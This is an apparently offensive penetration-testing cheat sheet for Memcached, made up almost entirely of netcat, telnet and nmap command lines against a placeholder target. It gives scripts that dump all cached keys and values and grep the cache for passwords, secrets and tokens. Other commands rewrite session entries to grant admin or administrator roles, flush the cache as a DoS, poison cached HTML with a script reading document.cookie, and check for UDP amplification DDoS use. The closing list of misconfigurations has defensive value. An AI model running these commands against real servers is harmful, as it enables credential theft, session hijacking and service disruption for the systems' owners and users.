Memcached
Default Port: 11211
Memcached is a high-performance, distributed memory caching system designed to speed up dynamic web applications by alleviating database load. It stores data in RAM as key-value pairs for quick retrieval. While primarily used for caching, memcached can store session data, API responses, and other temporary information. Misconfigured memcached instances can expose sensitive data and be exploited for denial of service or data manipulation.
Connect
Using telnet
You can use telnet to connect to memcached and send commands directly to manage cached data:
# Connect to memcached
telnet target.com 11211
# Basic commands
stats
stats items
stats slabs
get key_name
quit
Using netcat
# Connect with netcat
nc target.com 11211
# Send commands
echo "stats" | nc target.com 11211
echo "version" | nc target.com 11211
Using memcached Client (Python)
import memcache
# Connect to memcached
mc = memcache.Client(['target.com:11211'])
# Get value
value = mc.get('key')
print(value)
# Set value
mc.set('key', 'value')
# Get stats
stats = mc.get_stats()
print(stats)
Recon
Service Detection with Nmap
Use Nmap to detect memcached services and check if they're exposed without authentication.
nmap -p 11211 target.com
Banner Grabbing
Identify memcached server version and gather configuration details.
Using netcat
# Using netcat
echo "version" | nc target.com 11211
Using telnet
# Using telnet
telnet target.com 11211
version
Using nmap
# Using nmap
nmap -p 11211 -sV target.com
Enumeration
Statistics Gathering
Memcached provides detailed statistics through various commands that can reveal system information, cache usage, and stored key patterns.
# Get general stats
echo "stats" | nc target.com 11211
# Get item stats (shows slabs with data)
echo "stats items" | nc target.com 11211
# Get slab stats
echo "stats slabs" | nc target.com 11211
# Get settings
echo "stats settings" | nc target.com 11211
# Get sizes
echo "stats sizes" | nc target.com 11211
Key Enumeration
Extracting cached keys allows you to identify and retrieve sensitive data stored in memcached.
Manual Key Extraction
# List slabs with items
echo "stats items" | nc target.com 11211
# Dump keys from slab (e.g., slab 1, limit 100)
echo "stats cachedump 1 100" | nc target.com 11211
# Get specific key
echo "get key_name" | nc target.com 11211
Automated Key Extraction
# Automate key extraction
for slab in {1..30}; do
echo "stats cachedump $slab 100" | nc target.com 11211
done
Attack Vectors
No Authentication
Memcached by default has no authentication mechanism, making it trivial to access and manipulate cached data if exposed.
# Test access
echo "version" | nc target.com 11211
# If version returns, memcached is accessible
# Enumerate and extract all data
Data Extraction
Extracting all cached data requires iterating through slabs and dumping their keys and values.
# Extract all keys and values
# Step 1: Get slabs
slabs=$(echo "stats items" | nc target.com 11211 | grep "items:" | cut -d: -f2 | sort -u)
# Step 2: Dump each slab
for slab in $slabs; do
echo "stats cachedump $slab 1000" | nc target.com 11211
done > keys.txt
# Step 3: Extract values
cat keys.txt | grep "ITEM" | awk '{print $2}' | while read key; do
echo "get $key" | nc target.com 11211
done
Data Manipulation
You can modify cached data to alter application behavior, escalate privileges, or inject malicious content.
Basic Data Manipulation
# Modify cached data
echo -e "set session_admin 0 0 4\r\ntest" | nc target.com 11211
# Delete keys
echo "delete key_name" | nc target.com 11211
# Flush all data (DoS)
echo "flush_all" | nc target.com 11211
Session Data Manipulation
# Modify session data
# If application uses memcached for sessions
echo -e "set user_12345_session 0 0 20\r\n{\"admin\":true}" | nc target.com 11211
Session Hijacking
Applications often store session data in memcached, allowing you to steal or manipulate user sessions.
Finding and Extracting Sessions
# Find session keys
echo "stats items" | nc target.com 11211 | grep session
# Get session data
echo "get sess_abc123" | nc target.com 11211
Session Privilege Escalation
# Modify session to elevate privileges
echo -e "set sess_abc123 0 0 25\r\n{\"role\":\"administrator\"}" | nc target.com 11211
Amplification DDoS
Memcached can be abused for UDP amplification attacks.
# Memcached responds with large stats output to small request
# Can amplify attack by 10,000x - 51,000x
# Check if UDP is enabled
nmap -sU -p 11211 target.com
# If open, it can be abused as DDoS reflector
# (Don't do this without permission)
Post-Exploitation
Credential Harvesting
Search for sensitive credentials stored in memcached cache.
Automated Credential Search
# Search for credentials in cache
echo "stats cachedump 1 1000" | nc target.com 11211 | while read line; do
key=$(echo $line | awk '{print $2}')
echo "get $key" | nc target.com 11211 | grep -i "password\|secret\|token"
done
Common Credential Keys
# Common cached credential keys
get api_key
get database_password
get admin_token
get jwt_secret
Cache Poisoning
Inject malicious data into memcached cache to compromise application behavior.
User Profile Poisoning
# Poison cache with malicious data
# If application caches user profiles
echo -e "set user_profile_123 0 0 50\r\n{\"username\":\"admin\",\"role\":\"superadmin\"}" | nc target.com 11211
HTML Content Poisoning
# Poison cached HTML
echo -e "set page_home 0 0 50\r\n<script>alert(document.cookie)</script>" | nc target.com 11211
Common Memcached Commands
| Command | Description | Usage |
|---|---|---|
stats | Get statistics | stats |
stats items | Get slab stats | stats items |
stats cachedump | Dump keys | stats cachedump 1 100 |
get | Get value | get key_name |
set | Set value | set key 0 0 5 |
delete | Delete key | delete key_name |
flush_all | Delete all | flush_all |
version | Get version | version |
quit | Close connection | quit |
Useful Tools
| Tool | Description | Primary Use Case |
|---|---|---|
| telnet | Terminal client | Manual testing |
| netcat | Network utility | Connection testing |
| memcached-tool | Official tool | Management |
| libmemcached-tools | Command-line tools | Testing and debug |
| Nmap | Network scanner | Service detection |
| Metasploit | Exploitation framework | Automated testing |
Security Misconfigurations
- ❌ No authentication
- ❌ Exposed to internet (0.0.0.0)
- ❌ UDP protocol enabled (DDoS risk)
- ❌ No firewall restrictions
- ❌ Sensitive data cached
- ❌ Session data in cleartext
- ❌ No encryption
- ❌ Default port accessible
- ❌ No access logging
- ❌ Large memory allocation (DDoS target)